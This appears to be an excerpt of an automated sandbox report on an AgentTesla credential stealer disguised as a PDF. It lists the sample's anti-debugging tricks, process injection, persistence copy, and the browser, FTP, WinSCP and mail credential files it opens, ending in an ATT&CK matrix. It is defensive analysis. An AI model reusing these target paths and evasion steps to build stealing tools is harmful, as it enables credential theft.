                      Source: A4-058000200390-10-14_REV_pdf.exe, 00000000.00000002.705986735.00000000051E0000.00000002.00000001.sdmp, A4-058000200390-10-14_REV_pdf.exe, 00000008.00000002.918554184.0000000005F50000.00000002.00000001.sdmp, WerFault.exe, 0000000B.00000002.703525513.0000000004E80000.00000002.00000001.sdmp, NewApp.exe, 00000012.00000002.846768409.00000000055D0000.00000002.00000001.sdmp, NewApp.exe, 00000013.00000002.847227235.0000000004B80000.00000002.00000001.sdmp, NewApp.exe, 00000018.00000002.918863074.00000000058E0000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
                      Source: WerFault.exe, 0000000B.00000003.700535576.0000000004BD4000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000002.886267678.0000000004BF4000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
                      Source: A4-058000200390-10-14_REV_pdf.exe, 00000000.00000002.705986735.00000000051E0000.00000002.00000001.sdmp, A4-058000200390-10-14_REV_pdf.exe, 00000008.00000002.918554184.0000000005F50000.00000002.00000001.sdmp, WerFault.exe, 0000000B.00000002.703525513.0000000004E80000.00000002.00000001.sdmp, NewApp.exe, 00000012.00000002.846768409.00000000055D0000.00000002.00000001.sdmp, NewApp.exe, 00000013.00000002.847227235.0000000004B80000.00000002.00000001.sdmp, NewApp.exe, 00000018.00000002.918863074.00000000058E0000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
                      Source: A4-058000200390-10-14_REV_pdf.exe, 00000000.00000002.705986735.00000000051E0000.00000002.00000001.sdmp, A4-058000200390-10-14_REV_pdf.exe, 00000008.00000002.918554184.0000000005F50000.00000002.00000001.sdmp, WerFault.exe, 0000000B.00000002.703525513.0000000004E80000.00000002.00000001.sdmp, NewApp.exe, 00000012.00000002.846768409.00000000055D0000.00000002.00000001.sdmp, NewApp.exe, 00000013.00000002.847227235.0000000004B80000.00000002.00000001.sdmp, NewApp.exe, 00000018.00000002.918863074.00000000058E0000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
                      Source: WerFault.exe, 0000000B.00000002.703491956.0000000004C80000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
                      Source: A4-058000200390-10-14_REV_pdf.exe, 00000000.00000002.697430851.00000000010DF000.00000004.00000020.sdmp, A4-058000200390-10-14_REV_pdf.exe, 00000008.00000002.920904751.00000000067E0000.00000004.00000001.sdmp, NewApp.exe, 00000013.00000002.814816354.0000000000972000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: A4-058000200390-10-14_REV_pdf.exe, 00000000.00000002.705986735.00000000051E0000.00000002.00000001.sdmp, A4-058000200390-10-14_REV_pdf.exe, 00000008.00000002.918554184.0000000005F50000.00000002.00000001.sdmp, WerFault.exe, 0000000B.00000002.703525513.0000000004E80000.00000002.00000001.sdmp, NewApp.exe, 00000012.00000002.846768409.00000000055D0000.00000002.00000001.sdmp, NewApp.exe, 00000013.00000002.847227235.0000000004B80000.00000002.00000001.sdmp, NewApp.exe, 00000018.00000002.918863074.00000000058E0000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeProcess information queried: ProcessInformation

                      Anti Debugging:

                      barindex
                      Contains functionality to hide a thread from the debuggerShow sources
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeCode function: 0_2_00E992E0 NtSetInformationThread ?,00000011,?,?,?,?,?,?,?,00E99F4F,00000000,00000000
                      Hides threads from debuggersShow sources
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeThread information set: HideFromDebugger
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeThread information set: HideFromDebugger
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeThread information set: HideFromDebugger
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeThread information set: HideFromDebugger
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeThread information set: HideFromDebugger
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeThread information set: HideFromDebugger
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeThread information set: HideFromDebugger
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeThread information set: HideFromDebugger
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeThread information set: HideFromDebugger
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeThread information set: HideFromDebugger
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeThread information set: HideFromDebugger
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeThread information set: HideFromDebugger
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeThread information set: HideFromDebugger
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeThread information set: HideFromDebugger
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeThread information set: HideFromDebugger
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeThread information set: HideFromDebugger
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeThread information set: HideFromDebugger
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeThread information set: HideFromDebugger
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeThread information set: HideFromDebugger
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeThread information set: HideFromDebugger
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeThread information set: HideFromDebugger
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeThread information set: HideFromDebugger
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeThread information set: HideFromDebugger
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeThread information set: HideFromDebugger
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeThread information set: HideFromDebugger
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeThread information set: HideFromDebugger
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeThread information set: HideFromDebugger
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeThread information set: HideFromDebugger
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeThread information set: HideFromDebugger
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeThread information set: HideFromDebugger
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeThread information set: HideFromDebugger
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeThread information set: HideFromDebugger
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeThread information set: HideFromDebugger
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeThread information set: HideFromDebugger
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeThread information set: HideFromDebugger
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeThread information set: HideFromDebugger
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeThread information set: HideFromDebugger
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeThread information set: HideFromDebugger
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeThread information set: HideFromDebugger
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeThread information set: HideFromDebugger
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeThread information set: HideFromDebugger
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeThread information set: HideFromDebugger
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeProcess queried: DebugPort
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeProcess queried: DebugPort
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess queried: DebugPort
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess queried: DebugPort
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess queried: DebugPort
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess queried: DebugPort
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeCode function: 8_2_067B8460 LdrInitializeThunk,
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeProcess token adjusted: Debug
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeProcess token adjusted: Debug
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess token adjusted: Debug
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess token adjusted: Debug
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess token adjusted: Debug
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeMemory allocated: page read and write | page guard

                      HIPS / PFW / Operating System Protection Evasion:

                      barindex
                      Injects a PE file into a foreign processesShow sources
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeMemory written: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exe base: 400000 value starts with: 4D5A
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeMemory written: C:\Users\user\AppData\Roaming\NewApp\NewApp.exe base: 400000 value starts with: 4D5A
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeMemory written: C:\Users\user\AppData\Roaming\NewApp\NewApp.exe base: 400000 value starts with: 4D5A
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c timeout 1
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeProcess created: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exe C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exe
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 1
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c timeout 1
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess created: C:\Users\user\AppData\Roaming\NewApp\NewApp.exe C:\Users\user\AppData\Roaming\NewApp\NewApp.exe
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c timeout 1
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess created: C:\Users\user\AppData\Roaming\NewApp\NewApp.exe C:\Users\user\AppData\Roaming\NewApp\NewApp.exe
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 1
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 1
                      Source: A4-058000200390-10-14_REV_pdf.exe, 00000008.00000002.914746965.00000000017D0000.00000002.00000001.sdmp, NewApp.exe, 00000018.00000002.915456140.00000000012F0000.00000002.00000001.sdmpBinary or memory string: Program Manager
                      Source: A4-058000200390-10-14_REV_pdf.exe, 00000008.00000002.914746965.00000000017D0000.00000002.00000001.sdmp, NewApp.exe, 00000018.00000002.915456140.00000000012F0000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
                      Source: A4-058000200390-10-14_REV_pdf.exe, 00000008.00000002.914746965.00000000017D0000.00000002.00000001.sdmp, NewApp.exe, 00000018.00000002.915456140.00000000012F0000.00000002.00000001.sdmpBinary or memory string: Progman
                      Source: A4-058000200390-10-14_REV_pdf.exe, 00000008.00000002.914746965.00000000017D0000.00000002.00000001.sdmp, NewApp.exe, 00000018.00000002.915456140.00000000012F0000.00000002.00000001.sdmpBinary or memory string: Progmanlock
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeQueries volume information: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exe VolumeInformation
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeQueries volume information: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exe VolumeInformation
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeQueries volume information: C:\Users\user\AppData\Roaming\NewApp\NewApp.exe VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeQueries volume information: C:\Users\user\AppData\Roaming\NewApp\NewApp.exe VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeQueries volume information: C:\Users\user\AppData\Roaming\NewApp\NewApp.exe VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeQueries volume information: C:\Users\user\AppData\Roaming\NewApp\NewApp.exe VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                      Stealing of Sensitive Information:

                      barindex
                      Yara detected AgentTeslaShow sources
                      Source: Yara matchFile source: 0000001F.00000002.811192969.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000002.833553760.00000000042AC000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.702719345.000000000442A000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000018.00000002.915676599.0000000002898000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.915637033.0000000002DFA000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.912000692.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000018.00000002.911999717.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000013.00000002.832293360.000000000380F000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: A4-058000200390-10-14_REV_pdf.exe PID: 7040, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: NewApp.exe PID: 2092, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: A4-058000200390-10-14_REV_pdf.exe PID: 1572, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: NewApp.exe PID: 6416, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: NewApp.exe PID: 1216, type: MEMORY
                      Source: Yara matchFile source: 18.2.NewApp.exe.42f16b0.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 31.2.NewApp.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.A4-058000200390-10-14_REV_pdf.exe.4470150.8.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.NewApp.exe.42ac090.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.A4-058000200390-10-14_REV_pdf.exe.442ab30.9.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.A4-058000200390-10-14_REV_pdf.exe.4470150.8.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.NewApp.exe.3855070.8.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.A4-058000200390-10-14_REV_pdf.exe.442ab30.9.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 24.2.NewApp.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.NewApp.exe.380fa50.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.NewApp.exe.3855070.8.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.A4-058000200390-10-14_REV_pdf.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.NewApp.exe.380fa50.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.NewApp.exe.42ac090.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.NewApp.exe.42f16b0.7.raw.unpack, type: UNPACKEDPE
                      Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)Show sources
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                      Tries to harvest and steal browser information (history, passwords, etc)Show sources
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                      Tries to harvest and steal ftp login credentialsShow sources
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\
                      Tries to steal Mail credentials (via file access)Show sources
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                      Source: Yara matchFile source: 00000018.00000002.915676599.0000000002898000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.915637033.0000000002DFA000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: A4-058000200390-10-14_REV_pdf.exe PID: 1572, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: NewApp.exe PID: 6416, type: MEMORY

                      Remote Access Functionality:

                      barindex
                      Yara detected AgentTeslaShow sources
                      Source: Yara matchFile source: 0000001F.00000002.811192969.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000002.833553760.00000000042AC000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.702719345.000000000442A000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000018.00000002.915676599.0000000002898000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.915637033.0000000002DFA000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.912000692.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000018.00000002.911999717.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000013.00000002.832293360.000000000380F000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: A4-058000200390-10-14_REV_pdf.exe PID: 7040, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: NewApp.exe PID: 2092, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: A4-058000200390-10-14_REV_pdf.exe PID: 1572, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: NewApp.exe PID: 6416, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: NewApp.exe PID: 1216, type: MEMORY
                      Source: Yara matchFile source: 18.2.NewApp.exe.42f16b0.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 31.2.NewApp.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.A4-058000200390-10-14_REV_pdf.exe.4470150.8.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.NewApp.exe.42ac090.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.A4-058000200390-10-14_REV_pdf.exe.442ab30.9.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.A4-058000200390-10-14_REV_pdf.exe.4470150.8.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.NewApp.exe.3855070.8.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.A4-058000200390-10-14_REV_pdf.exe.442ab30.9.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 24.2.NewApp.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.NewApp.exe.380fa50.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.NewApp.exe.3855070.8.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.A4-058000200390-10-14_REV_pdf.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.NewApp.exe.380fa50.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.NewApp.exe.42ac090.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.NewApp.exe.42f16b0.7.raw.unpack, type: UNPACKEDPE

                      Mitre Att&ck Matrix

                      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                      Valid AccountsWindows Management Instrumentation211Registry Run Keys / Startup Folder1Process Injection112Disable or Modify Tools1OS Credential Dumping2File and Directory Discovery1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumIngress Tool Transfer1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                      Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsRegistry Run Keys / Startup Folder1Obfuscated Files or Information1Input Capture211System Information Discovery114Remote Desktop ProtocolData from Local System2Exfiltration Over BluetoothEncrypted Channel1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                      Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Software Packing1Credentials in Registry1Query Registry1SMB/Windows Admin SharesEmail Collection1Automated ExfiltrationNon-Standard Port1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                      Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Timestomp1NTDSSecurity Software Discovery431Distributed Component Object ModelInput Capture211Scheduled TransferNon-Application Layer Protocol2SIM Card SwapCarrier Billing Fraud
                      Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptMasquerading1LSA SecretsVirtualization/Sandbox Evasion25SSHClipboard Data1Data Transfer Size LimitsApplication Layer Protocol112Manipulate Device CommunicationManipulate App Store Rankings or Ratings
